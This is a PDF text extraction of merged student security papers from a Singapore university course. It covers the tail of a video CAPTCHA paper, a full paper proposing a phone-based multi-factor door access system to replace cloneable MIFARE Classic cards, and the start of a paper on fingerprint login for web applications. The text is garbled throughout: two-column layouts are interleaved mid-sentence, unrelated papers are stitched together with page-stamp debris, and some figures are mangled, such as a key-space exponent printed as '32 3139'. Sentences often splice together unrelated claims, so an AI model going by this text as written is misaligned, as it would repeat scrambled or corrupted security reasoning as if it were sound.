seeing​ ​will​ ​be​ ​unable​ ​to​ ​perform​ ​the​ ​CAPTCHA​ ​test​ ​properly. (e.g. 10s) for every user before we close the session with the user.
By doing so, other users will be more likely to be able to access
4.2.3 Human​ ​computation this page as no other user can remain in the page beyond the
This captcha may remain vulnerable if the attacker managed to do stipulated​ ​time​ ​period.
a run through all of our captcha and stores the captcha and its
corresponding answers in their knowledgebase. By doing so, it
allows bots created by the attacker to be able to conduct
successful attacks by searching their database and replay the 6. ACKNOWLEDGEMENTS
answer,​ ​assuming​ ​that​ ​storage​ ​at​ ​attacker’s​ ​side​ ​is​ ​possible. We would like to show our appreciation to Dr. Hugh Anderson for
presenting us the opportunity to explore on the topic regarding
4.2.4 Denial​ ​of​ ​Service CAPTCHA.
Many bots can flood our server by constantly and deliberately
selecting the wrong answer. This may prevent genuine access by
the​ ​users​ ​who​ ​are​ ​trying​ ​to​ ​access​ ​the​ ​page. 7. REFERENCES
[1] “Advanced​ ​Web​ ​Scraping:​ ​Bypassing​ ​"403​ ​Forbidden,"
5. Enhancements captchas,​ ​and​ ​more”​ ​Evan​ ​Sangaline​ ​2017-03-14.​ ​Retrieved
5.1.1 Improving​ ​answer​ ​choices 26​ ​Oct​ ​2017.
http://sangaline.com/post/advanced-web-scraping-tutorial/
Increasing the number of choices will reduce the chance of
successful attack. Alternatives include enhancing our video along [2] “Captcha​ ​Technologies​ ​Market​ ​Share​ ​and​ ​Web​ ​Usage
with a text captcha, and adding a secondary open-ended question Statistics”.​ ​SimilarTech.​ ​Retrieved​ ​2017-11-04
which requires another input from the user. This alternative https://www.similartech.com/categories/captcha
enhancement is inspired by NuCaptcha. The questions to be asked [3] “Section​ ​508​ ​CAPTCHA:​ ​How​ ​to​ ​Make​ ​CAPTCHA​ ​Comply
here will be similar to that of a normal text captcha i.e. “Type in with​ ​Access​ ​Board​ ​Section​ ​508​ ​Standards”.​ ​Captcha.com.
the two words displayed in the video”. Furthermore, this text input Retrieved​ ​2017-11-04
will always be a random input of string that is generated every https://captcha.com/accessibility/section508-captcha.html
time then placed into the video. Thus, with another layer of check,
our​ ​video​ ​CAPTCHA​ ​be​ ​more​ ​reliable​ ​and​ ​less​ ​prone​ ​to​ ​attacks. [4] Claudia​ ​Cruz-Perez;​ ​Oleg​ ​Starostenko;​ ​Fernando
Uceda-Ponga;​ ​Vicente​ ​Alarcon-Aquino;​ ​Leobardo
5.1.2 Improving​ ​Accessibility Reyes-Cabrera​ ​(30​ ​June​ ​2012).​ ​"Breaking​ ​reCAPTCHAs
An audio-based CAPTCHA could be implemented in the video with​ ​Unpredictable​ ​Collapse:​ ​Heuristic​ ​Character
CAPTCHA to allow people who are disabled to be able to gain Segmentation​ ​and​ ​Recognition".​ ​In​ ​Carrasco-Ochoa,​ ​Jesús
access. Ariel;​ ​Martínez-Trinidad,​ ​José​ ​Francisco;​ ​Olvera​ ​López,​ ​José
Arturo;​ ​Boyer,​ ​Kim​ ​L.​ ​Pattern​ ​Recognition.​ ​Lecture​ ​Notes​ ​in
5.1.3 Preventing​ ​Human​ ​Computation Computer​ ​Science.​ ​7329.​ ​México.​ ​pp.​ ​155–165.
Upon improving the answer choices with the alternative method doi:10.1007/978-3-642-31149-9_16.​ ​ISBN
of adding additional text input field where text is also a random 978-3-642-31148-2.
string of text generated that will be placed in the video, our [5] "Are​ ​you​ ​a​ ​robot?​ ​Introducing​ ​"No​ ​CAPTCHA
keyspace will be significantly huge. Additionally, human reCAPTCHA"".​ ​Google.​ ​2014-12-03.​ ​Retrieved​ ​2017-11-04.
computation attack can be prevented by tracking using our own https://security.googleblog.com/2014/12/are-you-robot-intro
personal logs (e.g. htAccess/cPanel). Through such tracking, we ducing-no-captcha.html
will be able to detect the user that is currently attempting to store
our videos, images and text. After which, simply ban this user. As [6] “InsideReCaptcha”​ ​ReCaptchaReverser.​ ​2014-12-10.
such, the attacker is highly unable to store all possible set of Retrieved​ ​2017-11-04.
answers, especially when the text is always randomly generated, https://github.com/neuroradiology/InsideReCaptcha
before​ ​inserting​ ​into​ ​the​ ​video. [7] Certification,​ ​Digital​ ​(2017-03-14).​ ​"Digital​ ​Certification:
5.1.4 Preventing​ ​Denial​ ​of​ ​Service The​ ​Digital​ ​Rating​ ​For​ ​Websites".​ ​Digital​ ​Certification​ ​|
Blog.​ ​Retrieved​ ​2017-11-04.
A general idea of preventing DOS is to impose lower bandwidth https://digital-certification.com/blog/google-improves-their-c
and query resource from any source/client after every single aptcha-with-no-user-interaction-required/
attempt and access to our webpage. An implementation of
imposing a fixed number of tries a particular user can fail before [8] "Animated​ ​CAPTCHA​ ​tech​ ​aims​ ​to​ ​fox​ ​spambots".​ ​The
imposing a time penalty (e.g. 10 mins) is one way whereby we Register.​ ​Retrieved​ ​2017-11-04.
can reduce the chance of a DOS attack. This can be done by either https://www.theregister.co.uk/2010/07/01/animated_captcha/
tracking the IP address of the client. To further enhance this
implementation, another timer can be set and tracked for every

gp05
PDFsam_merge 36
40
Smart Door Authentication System
Tan Jia Shun Tan Wang Leng Tean Zheng Yang
National University of National University of National University of
Singapore Singapore Singapore
jiashun.t@u.nus.edu wangleng@u.nus.edu teanzhengyang@u.nus.edu

Teddy Hartono Yang Jung Kai


National University of National University of
Singapore Singapore
hartantoteddy@u.nus.edu A0121593@u.nus.edu

ABSTRACT into detail about how to exploit the current system, but rather
The NUS smart card system is currently being used to restrict explore the possibility of a more secure system.
unauthorized students from being able to access certain sensitive On top of the vulnerabilities associated with the MIFARE Classic
areas of the school compound. However, at present, smart cards cards, there are also numerous ways a user could exploit the NUS
are becoming increasingly vulnerable to attacks such as cloning. smart card system. For example, the smart card could be obtained
An attacker could make use of current technologies in order to by an unauthorized adversary via an existing student or staff. The
obtain a clone of a valid NUS smart card to gain access to adversary could obtain the card in numerous ways such as getting
restricted areas. Hence, this paper will explore the feasibility of a it willingly from the authorized personnel himself, stealing it from
Smart Door Authentication system which employs Multi-factor an authorized personnel via social engineering means or even just
Authentication, using phones as a replacement for the currently perhaps picking up a missing card from the floor. Once an
insecure NUS smart cards. unauthorized adversary has obtained an NUS smart card, he could
use the card to enter areas which he normally would not be able to
1. INTRODUCTION access. This is a large security flaw as due to the nature of NFC
technology used, the identity of the authorized personnel is often
The usage of smart cards are becoming increasingly commonplace
not verified against the identity of the person using the card. For
due to the innovation of new Near Field Communication (NFC)
example, a non-student adversary could access the student labs or
technologies. These cards are being used in various different ways
the central library by putting a student’s NUS smart card in his
ranging from pay-wave systems such as VISA Paywave to area
wallet and by utilizing NFC to grant him access to these restricted
access using NUS Matriculation cards.
areas, his identity as a non-student will not be revealed.
However, as the populace trends towards the usage of these cards,
new efficient and effective methods are being developed towards 3. PROPOSED SYSTEM
the attack of these cards as well. Therefore, there is a need for a
The Smart Door Authentication system taps on multi-factor
new system that would provide a higher level of security than the
authentication in order to improve security in the field of area
current one that we have now.
access. The aim of our system is to provide a higher level of
security without compromising too much on the ease of use.
2. EXISTING SYSTEM Therefore, we propose to the use of mobile phones to replace the
In 1994, MIFARE Classic revolutionized the contactless smart currently insecure, MIFARE Classic NUS Matriculation cards. In
card business by introducing a low-cost smart card that was able the system we propose, we use fingerprint biometric
to transmit encrypted data. authentication, issue two separate One Time Pass (OTP), one for
Currently, it is being used in a variety of applications worldwide, the Door and one for the student, as well as an IVLE token to
including our NUS matriculation card. However, in 2009, a new validate the student’s identity.
and improved attack on MIFARE classic was discovered. The Multi-factor authentication is a method of access control. A user
attack allows the adversary to recover the secret key via wireless is only granted access after presenting several separate pieces of
interaction with less than 500 queries to the vulnerable card. evidence to an authentication mechanism. The evidences typically
In spite of this vulnerability, the NUS matriculation cards that we consists of at least two of the following categories: knowledge
use today for authentication are MIFARE Classic cards. The (what they know), possession (what they have) and inherence
implication of the continual usage of vulnerable cards is that they (what they are).
are very susceptible to being cloned. A cloned MIFARE Classic Each student’s phone is bounded to his or her unique student id.
card would be able to grant an adversary access to restricted areas The student uses an android application in order to scan a unique
in the school compound, which in turn would be detrimental to RFID or QR code of a door the student wishes to access.
the school’s general security.
The android application will verify the validity of the student’s
Previous students of this module have done projects regarding the request by checking his fingerprint and student data against the
exploit of MIFARE Classic Cards (Exploiting the Security Lapses respective databases.
in the NUS Matriculation Card, 2016/17). Hence we shall not go

gp06
PDFsam_merge 37
41
This allows us to identify the student based on their knowledge
(via the IVLE token), possession (phone) and their inherence (via
Upon entering the application, the user sees the main menu:
fingerprinting).
Our system currently consists of 3 major software components
that handles the request to open the door – the Door Server, the
Android application and the Database.
The prototype implementation of the system can be found in
https://github.com/CS3235-1718-SEM1.
The overall schema is shown in the Appendix section.

3.1 Door Server


The purpose of the Door Server is to handle the requests from the
android application to open the door, to validate the request and
to open the door if authorized.
To prevent replay attacks, there are two OTPs in our system:

 Door OTP: Each door has a rotating One Time Pass


(OTP) which changes at regular intervals. This is to
enforce the rule that the user has to be in the physical
location in order to unlock the door.

 Student OTP: Each student also has a rotating One


Time Pass (OTP) which is derived from a unique IVLE
token upon login, to prevent their secret key from being
stolen via NFC sniffing.
The user will scan the door’s OTP using the android application, Figure 1: Illustration of Android Application
which reads the OTP via NFC or scanning the QR-code. The main menu contains 3 buttons:
After which the user will have to validate his identity by  Settings: Only for debugging and prototyping purposes
performing a biometric authentication via the phone's fingerprint (to allow us to configure the HTTP requests URLs).
scanner. This will authorize the application to generate the This button will not be available in the actual
student’s OTP. The application will then perform an HTTPS post application.
request with the student’s matriculation number, OTP and the  Login: Leads user to the stage of registering the
door’s id and OTP to the Door Server. smartphone with the door access system. The user will
The Door Server will validate that the door_id exist and that the have to visit the Computer Center to complete this
submitted OTP matches the door’s OTP which the door server stage.
will generate to compare against the submitted, once validated  Scan: Scan the QR code for a particular door. This is
forwards the door_id , student’s matric and OTP to database used when the user is trying to unlock the door.
server via a HTTPS post request for validation of the student’s There is no button for NFC because the user will just need to
identity and access rights. Depending on the result of the post bring his phone near to the NFC emitter to start the unlocking
request to database server’s request depending on the server’s process, rather than having to press a button.
reply, if a “200”, representing validated and authorized, the Door
Server will then proceed to open the door for the user, otherwise it 3.2.1 Process: Registering Smartphone
will just treat the request to open the door as invalid, replying the Upon pressing the “Login” button, the user is lead to an IVLE
android application’s request with a “400” which represents that login page. The user enters his credentials, and then the
the request has been denied and dropping the request. application will initiate an HTTPS request to the registration
Having a unique OTP that is bound to each door, requires that the database to authorize the phone. A secret key will be returned by
user must be physically present at the location to open the door. the registration database, which is then stored in the local storage.
Otherwise, if the door’s identity is statically assigned (i.e. only This secret key will be used for the student OTP generation. At
needing the door ID) and without any protection, then the door this stage, if the user misplaces or changes the registered phone,
might become more vulnerable to pre-crafted HTTP request to the he has to visit the Computer Centre as the personnel will have to
door server to remotely open doors. configure the database to accept the new phone (this is a
mechanism to prevent the user from registering multiple phones.
Only one phone is allowed per student).
3.2 Android Application
The purpose of the Android Application is to introduce the IVLE 3.2.2 Process: Unlocking Door
authentication and fingerprinting verification. There are two ways the user can unlock the door:
 Scanning through QR code

gp06
PDFsam_merge 38
42
The user will tap the “Scan” button on the main menu. He or she permission to access the corresponding door. Otherwise, an HTTP
will then proceed to scan the QR code on the door (which is the 400 response is returned.
door’s id and OTP). The fingerprint authentication screen is
The OTP is generated from the user’s secret_key that changes at a
brought up afterwards.
regular interval. To protect against a brute-force attempt on the
 Scanning via NFC OTP, the system records the last room access request and it only
Instead of tapping any button, the user will just have to be on the accept 3 room access request per second. This significantly
main menu, and bring his phone near the door’s NFC emitter. The reduces the amount of guesses an attacker can make on the OTP.
application will pick up the NFC’s record (which contains the Because the OTP changes every 30 seconds, the attacker can only
door’s id and OTP), and brings the user to the fingerprint make 90 brute-force attempts, out of the 10⁶ keyspace of the OTP.
authentication screen. As such, the probability of a successful brute-force attack is
roughly 1 in 10,000.
Both methods bring the user to the authentication stage. Upon
scanning the user’s fingerprint, the application, initiates an
HTTPS request to the door server with all the necessary 4. STRENGTHS AND WEAKNESSES OF
information (OTPs, door and user id) in order to unlock the door. PROPOSED SYSTEM
3.3 Database Access Layer 4.1 Strengths and Evaluations
The purpose of the Database Access Layer is to provide Our authentication system provides significantly higher security in
verification of the incoming requests against known and pre- the field of area access compared to the current NUS
collected data. Matriculation Card.

The Database Access Layer is simply an HTTPS RESTful API


that abstracts away database accesses. Currently, the API exposes
4.1.1 Multi-factor Authentication
It is significantly difficult for an adversary to obtain the student’s
2 endpoints, one for the door server, and the other for the android
fingerprint, phone and IVLE login information required to gain
client
access to the restricted area. Compared to the currently employed
solution which uses the vulnerable NUS matriculation card, it is
3.3.1 Android Client harder for an adversary to attack. This is based on the utilization
POST /register_user of the 3 different factors of authentication in multi-factor
This endpoint is called the first time a user successfully login to authentication.
IVLE using the android app. It takes in 2 parameters: the IVLE However, we have noted the case whereby once a student is
auth_token, and the IVLE_id. Once a request is received, it logged into IVLE, he would not have to login again. This would
proceeds to verify the user’s claimed identity, by checking the reduce our system into a 2 Factor-Authentication system which in
given auth_token against IVLE LAPI. Upon a successful turn would entail lower security. We could enforce the need to
verification, it fetches the list of doors the user is permitted to sign in every single time the student wishes to access a door,
access and generate a secret_key tied to this identity. All of these however, we feel that this will not be very intuitive to use for the
are stored in the database. Upon a successful request, an HTTP user.
200 response will be returned, 401 if the claimed identity is
invalid, and 403 if the user has already been registered in the Hence, perhaps we could simplify the system whereby the student
system. does not have to login every single time he wants to access an area
for the lower risk areas such as the NUS library. However, every
The database imposes the constraint that the user can only have time a student wishes to enter a more sensitive area such as
one phone registered in the system. Because to open a door, the research labs, he will be required to provide his IVLE credentials,
user must authenticate using his/her fingerprint, to open a door for effectively enforcing the third factor of authentication in our
a friend/outsider implies that the user must accompany the said system.
person. This is an effort to protect against user non-compliance --
in which, using the old mechanism, an NUS student/staff can just
lend his/her card to an outsider. At the same time, this mechanism
4.1.2 Enforcing Non-Repudiation of Room Access
In our current MIFARE smart card system, it is very difficult to
ensures non-repudiation of room access.
verify that the owner of the card is actually the person that is
The secret_key tied to the user’s identity is a base32 string of 40 tapping for room access. Therefore, should any incident happen in
characters. The keyspace of this secret key is 32 3139. Even with the room, the owner of the card can deny responsibility by
a number of supercomputers, it will be the end of the universe claiming that he or she has lost his card, and did not personally
before the attacker can get the correct secret key. enter the room.
It is easy for a person to lend his or her card to unauthorized
3.3.2 Door Server personnel. For example, student Harry wants to enter a room that
POST /can_access_door he has no access to. He could approach student Alice, who has
access, and ask to borrow her card. That way, Harry can gain
This endpoint is to check if a user can access a specific door. It access to the room even without the presence of Alice, as tapping
accepts 3 parameters: the door_id, IVLE_id, and the OTP. The the card is sufficient to enter the room.
endpoint returns an HTTP 200 response if the OTP is valid. The
door server will be informed whether the user has the required With our smartphone application, it is difficult for another person
to enter the room without the presence of the actual owner.
Lending the smartphone to another person is insufficient, as the

gp06
PDFsam_merge 39
43
fingerprint authentication is required to unlock the door. the user as his or her access will be denied even if all other factors
Furthermore, a smartphone is more expensive than a smartcard are positive.
(virtually $0 for the student), so the student will be more Based on a study done on fingerprint scanners, 85% of examiners
conscious about losing a smartphone versus a matriculation card. made at least one false negative error for an overall false negative
By doing so, we have effectively enforced non-repudiation of rate of 7.5%
room access. Even if the person is not present in the room, any However, in our system, we have not encountered any instances
incident that occurs will be directly his or her legal responsibility, of false negatives in our tests leading up to and during the STEPs
as he or she has authorized the access to the room. presentation. Therefore, perhaps this technology has progressed
significantly since the study done in 2010 and increased in
reliability since then.
4.1.3 Resistant against Brute Force or Cloning
Attacks 4.2.2 Fingerprinting authentication: Database
The student’s OTP is a 6 digit number that is generated using the manipulation
secret key. It is time-based, so a particular generated OTP is only The authenticated fingerprints are currently stored in the
valid for at most 30 seconds. smartphone’s fingerprint database.
It is difficult for a malicious attacker to brute force the secret key It is hard to guarantee that the smartphone’s fingerprint database
(as it is a base32 string of 40 characters). However, the malicious would not be maliciously tampered. For instance, a user might
attacker can attempt brute force the OTP token, by sending allow his friend to add his fingerprint to the smartphone, even
multiple HTTP requests to the door server, each request though such an action virtually allows him access to all
containing a different guess of the OTP. As described in the functionalities of his smartphone (instead of just only the door
previous section “Database Access Layer”, we thwart such an unlocking application), which pose a greater security risk to the
attempt by limiting requests to only 3 per second. user. Nevertheless, the user may do this out of convenience or
Hence, with both the request limitation and rotating OTP, brute ignorance.
forcing is theoretically challenging to do. A possible form of defence is to store fingerprint authentication
In contrast, a smartcard does not allow us to support a rotation information in the database access layer instead of relying on the
mechanism (since it is just a card and not a computing device). In smartphone’s database.
fact, as described under the “Existing System” section, cloning is The Android API does not divulge the fingerprint of the user to
possible since the content of the smartcard never changes, unlike the application. Instead, the application have to create a
our 30-second OTP. CryptoObject, and the android API would then sign this object
with the user’s fingerprint. Since only the user’s fingerprint would
4.1.4 Psychological Acceptability only be the one that can sign the object uniquely (other
Smartphone ownership is prevalent in Singapore. In the fingerprints will sign it differently), we can check the signed
Consumer Barometer research study done by Google, 91% of object with our Database Access Layer to verify that the person is
Singapore’s population owns a smartphone. indeed the user that registered his phone to our system, and not
someone else who has malicious gained access to the phone and
Therefore, as the prevalence of smartphone propagates throughout
added his own fingerprint to the smartphone’s database.
the world, it becomes more convenient for students to gain access
using their smartphone, rather than relying on them carrying With this new mechanism, the access point ‘/can_access_door’
around their matric card. This reduces the need of carrying an would now require a fingerprint authentication data (in the form
additional piece of plastic that would otherwise be not very useful of a signed object) as an additional parameter, before granting
in many other situations. access to the door.

4.2 Weaknesses and Mitigations 4.2.3 Cost


As with the majority of other systems, our system faces several Our system requires a complete overhaul of the current door
weaknesses from a practicality standpoint. authentication system. This may result in astronomical costs when
considering the scale of the current door application. While the
system is significantly more secure than the current method of
4.2.1 Fingerprinting authentication: False Negatives using MIFARE Classic cards for authentication, there is no
Fingerprints provide an inherence factor in the multi-factor denying the cost-effectiveness of these MIFARE Classic cards.
authentication scheme. However, fingerprints are unable to be
changed in the same way as passwords or other authentication This is the classic issue of cost vs effectiveness. On one hand we
means. This is significant as if the fingerprint of the student is would like to maximize cost savings, however, we would also
compromised, the student is unable to change his or her have to maintain a certain level of security such that there is at
fingerprint data in the database. least a certain level of difficulty in breaking into the system. We
feel that the current system, although cost effective, provides little
Fingerprinting authentication has always been known for to no security given the current level of technological
instances of common false-negative and false-positive results. advancements.
Since our system makes use of Multi-factor authentication, false-
positives are less detrimental as access will only be granted if all
other factors are positive. However, false-negative results for the
fingerprinting authentication may cause significant frustration to

gp06
PDFsam_merge 40
44
4.2.4 Insider Attacks access the list of users that have attended the event, and NUS staff
If the personnel in the Computer Centre has access to the are less trained than security personnel. Instead of a log file, the
smartphone door server database, it is possible for a personnel in database will also need new functionalities to generate the said list
the Computer Centre to collude with a malicious student. to support attendance taking.
The personnel can leak a victim’s secret key to a malicious
student’s smartphone app by deliberately hijacking the HTTP
5.1.2 Ease of use and speed of system
Currently, there is only one mode of operation for our system, this
request of the smartphone user registration protocol, and then
mode might not be optimal for every single use case.
insert any arbitrary secret key that he or she desires (preferably a
victim’s secret key) For example, in a high traffic and less sensitive location like NUS
library, the additional second spent on scanning the thumbprint on
The only form of defence against this attack is to ensure that the
the application might increase the jam of people trying to enter
personnel is never able to inspect the server database content in
during peak hours, in this case it might be better if the user can
the first place.
just tap his phone and the reader and enter the library.
4.2.5 Lost and stolen phones On the other hand, for high value and sensitive locations like
If a determined attacker armed with the necessary technical research labs, offices and server rooms we might want to enable
expertise and resources decide to attack a student to gain access to additional requirements such as every entry requiring the user to
NUS facilities decides to steal and hack the phone, there is a enter his or her IVLE user password or even require another
possibility that the attack might be able to gain unauthorised additional separate hardware authenticable factor such as yubikey
access to NUS facilities, we can mitigate this problem, since we to open the door to ensure that the person entering this restricted
have already implement the constraint that the user can only have area is indeed authorized.
one phone registered in the system, a user must report any lost to This various modes can be defined based on a sliding scale on the
the system administrator as soon as possible to regain access to importance and nature of the room that is being protected, a more
NUS facilities, with this we will know when phones are sensitive location can require additional validations before
compromised and can act quickly to revoke the lost/stolen phones opening a door, while this might take additional time, it helps
ability to open door. minimize the chances of unauthorized access, while less sensitive
At the same time we have to also consider the requirements to pull location with high traffic can have lesser validations to help
of such an attack on the system. increase the traffic throughput.
Firstly, the attacker will have to find an unreported lost or steal a
phone, then gain root access to the phone and attempt to use it to 6. SUMMARY
enter NUS before the administrator can lock the phone’s access. We have achieved a proof of concept that our entire system works
However we have to consider that today’s smartphones have built by creating the whole system from scratch. We have even created
in trackers, allowing owners to locate their phone remotely a model of a door using servo motors and Arduinos to prove that
making it hard for the attacker to get away with their attack, at the at least on a small scale, our system can function as a valid door
same time gaining root access to the phone is not a trivial act, it authentication system.
requires significant technical expertise that not every person might Our system which utilizes multi-factor authentication in order to
have. identify the person requesting access, is more secure than the
The point is raising the bar for hacking the system to make it current employed system using MIFARE Classic NUS
beyond economic for a casual malicious user. Currently to gain matriculation cards. However, there are several weaknesses of the
illegal access one can easily just scan and clone the already system that may affect the practicality of the implementation of
cracked MIFARE based matric card, so the bar is extremely low. the overall system. Perhaps in higher risk areas, our system or a
Our system raises the bar to make it more expensive than it is system with a higher security can be used.
worth for a casual attacker. MIFARE Classic is also an outdated piece of technology that
should be replaced as soon as possible due to security loopholes.
5. POSSIBLE FUTURE ENHANCEMENTS As smartphones are prevalent in modern society, we feel that it
together with the multitude of sensors that it comes with, people
5.1.1 Taking Attendance at Events will be able to use their phones for access control very often in the
As our smart door authentication system verifies that the person near future.
that scans the door is definitely the owner of the smartphone, we
can expand the functionality of the system to include non-door 7. GITHUB REPOSITORY
unlocking scenarios. One such scenario is attendance taking at https://github.com/CS3235-1718-SEM1
events organized by NUS staff.
As attendance taking is a non-security activity (compared to door 8. ACKNOWLEDGMENTS
unlocking), we need a separate server that is similar to the door We would like to thank Professor Hugh Anderson for his
server, but is crafted for events instead, so as to attain separation unwavering support and guidance, as well as provision of
of privileges. hardware to make this project possible. In addition, we would also
Currently, door accesses are logged in a log file and are accessible like to thank ourselves for a job well done as this project would
by security staff for auditing purposes only. As such, to support not be possible without the hard work and contribution of every
attendance taking, we will require a more user-friendly GUI for single member in the team.
event organizers to use the system with ease, as they will need to

gp06
PDFsam_merge 41
45
We would also like to thank everybody for their kind and [3] S. Rosenblatt, J. Cipriani. 2015. Two-factor authentication:
constructive comments at our STEPs presentation. We hope that What you need to know (FAQ). Retrieved from:
with our new found knowledge and wisdom, one day we are able https://www.cnet.com/news/two-factor-authentication-what-you-
to make the world a safer place, one door at a time. need-to-know-faq/
[4] Courtois, Nicolas T. 2019. The Dark Side of Security by
9. REFERENCES Obscurity and Cloning MiFare Classic Rail and Building Passes
[1] Chen-Mou Cheng. 2010. MIFARE Classic: Completely Anywhere, Anytime
Broken. Retrieved from:
[5] Consumer Barometer research study. Retrieved from:
http://hitcon.org/download/2010/11_MIFARE%20Classic%20IS
%20Completely%20Broken.pdf
https://www.consumerbarometer.com/en/graph-
builder/?question=M1&filter=country:singapore
[2] B.T Ulery, R.A Hicklin, J.A Buscalia, M.A Robertson. 2010.
Accuracy and Reliability of Forensic Latent Fingerprint Decisions [6] https://en.wikipedia.org/wiki/YubiKey

gp06
PDFsam_merge 42
46
APPENDIX

Figure 2: Sequence Diagram

gp06
PDFsam_merge 43
47
PDFsam_merge 48
Fingerprint​ ​Authentication​ ​System​ ​for​ ​Web​ ​Applications  

​ ​Ye​ ​Kyaw​ ​Swa​ ​Aung​ ​Joshua  ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​Chua​ ​Si​ ​Hao 


  ​ ​ ​National​ ​University​ ​of​ ​Singapore  ​ ​ ​National​ ​University​ ​of​ ​Singapore 
  +65​ ​90585542   ​ ​ ​ ​ ​+65​ ​91508363       
​ ​ ​ ​ ​a0124072​@u.nus.edu ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​sihao@u.nus.edu 
 
​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​Choy​ ​Wan​ ​Ying​ ​Amanda   ​ ​Au-yong​ ​Xiang​ ​Rong​ ​Alwinson  
​​​​​​​​​​​​​N ​ ational​ ​University​ ​of​ ​Singapore ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​National​ ​University​ ​of​ ​Singapore  
​ ​ ​ ​+65​ ​91380402   ​ ​ ​ ​ ​+65​ ​98165999  
  ​ ​ ​ ​e0008791@u.nus.edu.sg ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​e0003957@u.nus.edu.sg

​ ​ ​ ​ ​ ​ ​ ​ ​ ​Adeeb​ ​Ashraf​ ​Bin​ ​Mirzha​ ​Alam​ ​Arif 


  ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​National​ ​University​ ​of​ ​Singapore 
​ ​ ​+65​ ​97715960  
    ​ ​ ​ ​e0032076@u.nus.edu.sg

ABSTRACT Passwords however have been broken time and time again through
means such as Bruteforcing or using of Rainbowtables and even
In this paper, we aim to explore the implementation and feasibility social engineering. As computers get faster, it will take less time
of a verification system for web applications that utilises biometric for a particular password to be cracked. In order to overcome this,
verification technology as an addition to the traditional username security systems have introduced Multi factor authentication
and password system that has already been widely implemented. (MFA), the most common of which is the two factor authentication
While the traditional method of authentication with passwords (2FA). Most 2FA systems take from at least 2 of the following
have proven to be sufficient in the past, the proliferation of modern categories ​knowledge (something they know), possession
technology entails greater security risks and necessitates an (something they have), and inherence (something they are)​[2]​.
improvement in the security systems that protect our valuable data. However with these improvements comes the cost of an extra step.
We also discuss how, this biometric verification service functions Not​ ​only​ ​that,​ ​the​ ​adoption​ ​of​ ​2FA​ ​is​ ​not​ ​widely​ ​enforced.
to provide a supplementary layer of security and how it is
comparably more convenient for users who are owners of In our project, our aim is to create a security system which is
smartphones with fingerprint scanners. We will also be analyzing universal thus easy to implement which at the same time provides
the vulnerabilities of the current system in comparison to the good​ ​security​ ​that​ ​matches​ ​today's​ ​required​ ​standards.
proposed system, as well as the practicality of the proposed system
in​ ​a​ ​realistic​ ​environment.
2.​ ​BACKGROUND
2.1​ ​Biometric​ ​Authentication
Categories​ ​and​ ​Subject​ ​Descriptors
In any secure system, user identification and authentication is a
critical aspect of access control and should be examined in greater
detail. Traditionally, user authentication is performed based on
General​ ​Terms
something the user knows (i.e. password, security questions) or
Passwords,​ ​Two​ ​Factor​ ​Authentication,​ ​Security something the user has (i.e. smartphone, token, magnetic card)​[16]​.
However, the username-password paradigm are inherently weak
due to a number of flaws. Firstly, since username is only required
Keywords to be unique rather than secret, username typically are chosen in
Biometric,​ ​2FA,​ ​TouchID,​ ​Chrome​ ​Extension,​ ​GoFinger the form of the user’s initial and last name (Donald Trump might
have “dtrump” as his username), a hacker can easily guess a
person’s username using social network sites such as facebook and
1.​ ​INTRODUCTION linkedin. On the other hand, the strength of the password is reliant
Passwords have been used in securing systems even before on user behaviour, a sufficiently long and strong password is
computers were invented. They have been used to gain access to unlikely to be cracked but it is also hard for user to remember.
exclusive clubs and societies or even used to identify spies from According to a study done by keeper-security in 2016​[4]​, about
allies during times of war. The modern day computed password 17% percent of user still use “123456” as their password, and a
was invented by Fernando Corbato​[1] in the early 1960’s. huge amount of people uses dictionary words as their password and

gp07
PDFsam_merge 45
49
uses the same password for multiple applications. The rise of authentication system. Thus, a potential variant of our system could
password cracking tools such as keyloggers, network sniffers and integrate facial recognition as an authentication system for web
GPU-password cracking rigs make passwords as a main security applications if facial recognition were to be incorporated into
mechanism​ ​that​ ​much​ ​more​ ​undesirable. mobile​ ​technology​ ​on​ ​a​ ​wide​ ​scale.

Some of the limitations of passwords can be overcome by utilising


2.2​ ​Authentication​ ​for​ ​Web​ ​Applications
a password manager such as LastPass, which stores all of the user’s
username and password for each website into an encrypted vault Solutions to help users manage passwords have become prevalent
which user can then choose to store in the cloud or their devices, as the traditional method to enter username and password becomes
this removes the weak passwords but essentially put all eggs into a severely vulnerable to common attacks such as keyloggers,
single basket. A compromised master password or breach in the dictionary attack, using short/easy passwords and even reusing
password manager could easily cause a huge amount of damage, passwords for many accounts. These vulnerabilities expose
making​ ​it​ ​a​ ​high​ ​risk​ ​high​ ​reward​ ​scheme. oblivious users to threats that could easily paramount to identity
theft.
Biometric authentication systems utilises measurable human
physiological and behavioural characteristics as a form of For the purpose of this study, several recognized password
verification of identity ​[3]​. Examples of such characteristics managers were explored to understand the standards and
include fingerprint, voice, iris and gait patterns. A powerful implementation methods employed by them. The password
advantage of using biometric authentication over traditional managers to be reviewed are LastPass, 1Password and browser’s
password-based authentication systems is that biometric entities are default​ ​keystore.
intrinsically unique, unchangeable, non-duplicable and
non-transferable ​[3]​. Hence, they cannot be lost or forgotten and 2.2.1​ ​LastPass
are​ ​less​ ​susceptible​ ​to​ ​low-level​ ​attacks​ ​such​ ​as​ ​shoulder​ ​surfing. Acquired by LogMeIn. Inc, a reputable company founded in 2003,
LastPass - password manager has been gaining its popularity as a
We have chosen to implement a fingerprint authentication system freemium model for these services. It offers a premium and family
in conjunction with the traditional password system for this project upgrades, flaunting enhanced features to compete with its
as penetration of smartphones equipped with fingerprint sensor are competitors.
rising steadily with an estimated 70% of all smartphone will come
with it in 2018, compared to a mere 19% in 2014​[6]​. In a usability
study by Bhagavatula et al., results showed that the iPhone
fingerprint unlock feature had the highest adoption rate as
compared to other biometric systems such as the Android face
unlock. Of all participants who were current users of the IPhone
fingerprint unlock feature, 69% cited convenience as a reason for
adopting the iPhone fingerprint unlock while the rest (41%) stated
security​ ​as​ ​a​ ​reason​[3]​.

